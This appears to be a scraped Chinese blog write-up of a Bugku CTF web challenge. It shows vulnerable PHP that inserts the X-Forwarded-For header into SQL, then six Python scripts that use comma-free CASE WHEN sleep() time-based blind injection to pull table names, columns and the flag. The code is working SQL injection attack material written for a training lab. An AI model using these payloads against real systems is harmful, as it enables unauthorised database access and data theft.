bugku------INSERT INTO 注入

原创

bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)

2019-03-31 19:05:28 Sea_Sand 阅读数 138 更多

分类专栏： sql注入 Bugku

       
       
       
       

        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           flag格式：flag{xxxxxxxxxxxx}
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           不如写个Python吧
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          
 
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           error_reporting(
           
           
           
           0);
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          
 
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           function getIp(){
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $ip = 
           
           
           
           '';
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           if(
           
           
           
           isset($_SERVER[
           
           
           
           'HTTP_X_FORWARDED_FOR'])){
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $ip = $_SERVER[
           
           
           
           'HTTP_X_FORWARDED_FOR'];
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           }
           
           
           
           else{
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $ip = $_SERVER[
           
           
           
           'REMOTE_ADDR'];
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           }
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $ip_arr = explode(
           
           
           
           ',', $ip);
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           return $ip_arr[
           
           
           
           0];
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          
 
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           }
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          
 
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $host=
           
           
           
           "localhost";
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $user=
           
           
           
           "";
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $pass=
           
           
           
           "";
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $db=
           
           
           
           "";
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          
 
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $connect = mysql_connect($host, $user, $pass) 
           
           
           
           or 
           
           
           
           die(
           
           
           
           "Unable to connect");
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          
 
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           mysql_select_db($db) 
           
           
           
           or 
           
           
           
           die(
           
           
           
           "Unable to select database");
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          
 
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $ip = getIp();
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           echo 
           
           
           
           'your ip is :'.$ip;
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           $sql=
           
           
           
           "insert into client_ip (ip) values ('$ip')";
          
          
          
          
         
         
         
         
        
        
        
        

         
         
         
         

          
          
          
          

         
         
         
         
         
         
         
         

          
          
          
          

           
           
           
           mysql_query($sql);
          
          
          
          
         
         
         
         
       
       
       
       
       
       
       
       

很明显，ip由xff头或者Remote-addr得来，然后在insert into语句中对这个ip进行查询，我们可以把注入语句加到这个ip中来进行注入。

尝试了报错盲注，没有回显，也试了bool盲注，发现length(database())的值不管设成多少页面都不报错。

最后就剩延时盲注了，简单判断下库长，发现有延时反应，且可判断出库长为5。

上面代码中的ip是被过滤掉逗号的，所以我们延时盲注时不能用if语句。

只能用case when then代替，其余的部分和if延时盲注一样，下面给出脚本：（mysql不分大小写）

1、爆联合表长（有了库长，且库名可用database()代替，不再爆库名了，想爆可以自己去爆：web15）

   
   
   
   

    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       import requests
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
 
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       url = 'http://123.206.87.240:8002/web15/'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       xff = "'+(
       
       
       
       select 
       
       
       
       case 
       
       
       
       when(
       
       
       
       substr((
       
       
       
       select 
       
       
       
       group_concat(table_name separator 
       
       
       
       '@') 
       
       
       
       from information_schema.tables 
       
       
       
       where table_schema=
       
       
       
       database()) 
       
       
       
       from {
       
       
       
       0} 
       
       
       
       for 
       
       
       
       1)=
       
       
       
       '')
       
       
       
       then 
       
       
       
       sleep(
       
       
       
       4) 
       
       
       
       else 
       
       
       
       1 
       
       
       
       end) + 
       
       
       
       '1"
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       for i in range(1, 30):
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
           try:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               headers = {'x-forwarded-
       
       
       
       for
       
       
       
       ':xff.format(i)}
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               r = requests.get(url, headers=headers, timeout = 3)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
           except requests.exceptions.ReadTimeout:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               print(i)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               break
      
      
      
      
     
     
     
     
   
   
   
   
   
   
   
   

结果为15，所以联合表长为14

2、爆联合表名

   
   
   
   

    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       import requests
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
 
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       url = 'http://123.206.87.240:8002/web15/'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       xff = "'+(
       
       
       
       select 
       
       
       
       case 
       
       
       
       when(
       
       
       
       substr((
       
       
       
       select 
       
       
       
       group_concat(table_name) 
       
       
       
       from information_schema.tables 
       
       
       
       where table_schema=
       
       
       
       database()) 
       
       
       
       from {
       
       
       
       0} 
       
       
       
       for 
       
       
       
       1)=
       
       
       
       '{1}')
       
       
       
       then 
       
       
       
       sleep(
       
       
       
       4) 
       
       
       
       else 
       
       
       
       1 
       
       
       
       end) + 
       
       
       
       '1"
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       table = ''
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       for i in range(1, 15):
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
           for j in dic:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               try:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   headers = {'x-forwarded-
       
       
       
       for
       
       
       
       ':xff.format(i, j)}
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   r = requests.get(url, headers=headers, timeout = 3)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               except requests.exceptions.ReadTimeout:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   table += j
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   print(table)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       print(table)
      
      
      
      
     
     
     
     
   
   
   
   
   
   
   
   

结果为：client_ip@flag

3、爆联合列长

   
   
   
   

    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       import requests
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
 
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       url = 'http://123.206.87.240:8002/web15/'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       xff = "'+(
       
       
       
       select 
       
       
       
       case 
       
       
       
       when(
       
       
       
       substr((
       
       
       
       select 
       
       
       
       group_concat(column_name separator 
       
       
       
       '@') 
       
       
       
       from information_schema.columns 
       
       
       
       where table_name=
       
       
       
       'flag') 
       
       
       
       from {
       
       
       
       0} 
       
       
       
       for 
       
       
       
       1)=
       
       
       
       '')
       
       
       
       then 
       
       
       
       sleep(
       
       
       
       4) 
       
       
       
       else 
       
       
       
       1 
       
       
       
       end) + 
       
       
       
       '1"
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       for i in range(1, 30):
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
           try:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               headers = {'x-forwarded-
       
       
       
       for
       
       
       
       ':xff.format(i)}
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               r = requests.get(url, headers=headers, timeout = 3)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
           except requests.exceptions.ReadTimeout:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               print(i)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               break
      
      
      
      
     
     
     
     
   
   
   
   
   
   
   
   

得到列长为4

4、爆联合列名

   
   
   
   

    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       import requests
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
 
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       dic = '0123456789abcdefghijklmnopqrstuvwxyz_@'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       url = 'http://123.206.87.240:8002/web15/'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       xff = "'+(
       
       
       
       select 
       
       
       
       case 
       
       
       
       when(
       
       
       
       substr((
       
       
       
       select 
       
       
       
       group_concat(column_name separator 
       
       
       
       '@') 
       
       
       
       from information_schema.columns 
       
       
       
       where table_name=
       
       
       
       'flag') 
       
       
       
       from {
       
       
       
       0} 
       
       
       
       for 
       
       
       
       1)=
       
       
       
       '{1}')
       
       
       
       then 
       
       
       
       sleep(
       
       
       
       4) 
       
       
       
       else 
       
       
       
       1 
       
       
       
       end) + 
       
       
       
       '1"
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       column = ''
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       for i in range(1, 5):
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
           for j in dic:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               try:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   headers = {'x-forwarded-
       
       
       
       for
       
       
       
       ':xff.format(i, j)}
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   r = requests.get(url, headers=headers, timeout = 3)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               except requests.exceptions.ReadTimeout:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   column += j
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   print(column)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       print(column)
      
      
      
      
     
     
     
     
   
   
   
   
   
   
   
   

只有一列，列名为flag。

5、爆内容长度

   
   
   
   

    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       import requests
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
 
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       url = 'http://123.206.87.240:8002/web15/'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       xff = "'+(
       
       
       
       select 
       
       
       
       case 
       
       
       
       when(
       
       
       
       substr((
       
       
       
       select flag 
       
       
       
       from flag) 
       
       
       
       from {
       
       
       
       0} 
       
       
       
       for 
       
       
       
       1)=
       
       
       
       '')
       
       
       
       then 
       
       
       
       sleep(
       
       
       
       4) 
       
       
       
       else 
       
       
       
       1 
       
       
       
       end) + 
       
       
       
       '1"
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       for i in range(1, 50):
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
           try:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               headers = {'x-forwarded-
       
       
       
       for
       
       
       
       ':xff.format(i)}
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               r = requests.get(url, headers=headers, timeout = 3)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               print(i)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
           except requests.exceptions.ReadTimeout:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               print(i)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               break
      
      
      
      
     
     
     
     
   
   
   
   
   
   
   
   

得内容长度为32

6、爆内容（即flag）

   
   
   
   

    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       import requests
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
 
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       dic = '0123456789abcdefghijklmnopqrstuvwxyz_'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       url = 'http:
       
       
       
       //123.206.87.240:8002/web15/'
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       xff = 
       
       
       
       "'+(select case when(substr((select flag from flag) from {0} for 1)='{1}')then sleep(4) else 1 end) + '1"
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       dump = ''
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       for i 
       
       
       
       in range(
       
       
       
       1, 
       
       
       
       33):
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
    
       
       
       
       for j 
       
       
       
       in dic:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
        
       
       
       
       try:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   headers = {'x-forwarded-
       
       
       
       for':xff.format(i, j)}
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
                   r = requests.
       
       
       
       get(url, headers=headers, timeout = 
       
       
       
       3)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
               except requests.exceptions.
       
       
       
       ReadTimeout:
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
            
       
       
       
       dump += j
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      
            
       
       
       
       print(
       
       
       
       dump)
      
      
      
      
     
     
     
     
    
    
    
    

     
     
     
     

      
      
      
      

     
     
     
     
     
     
     
     

      
      
      
      

       
       
       
       print(
       
       
       
       dump)
      
      
      
      
     
     
     
     
   
   
   
   
   
   
   
   

得出：cdbf14c9551d5be5612f7bb5d2867853

有 0 个人打赏

文章最后发布于: 2019-03-31 19:05:28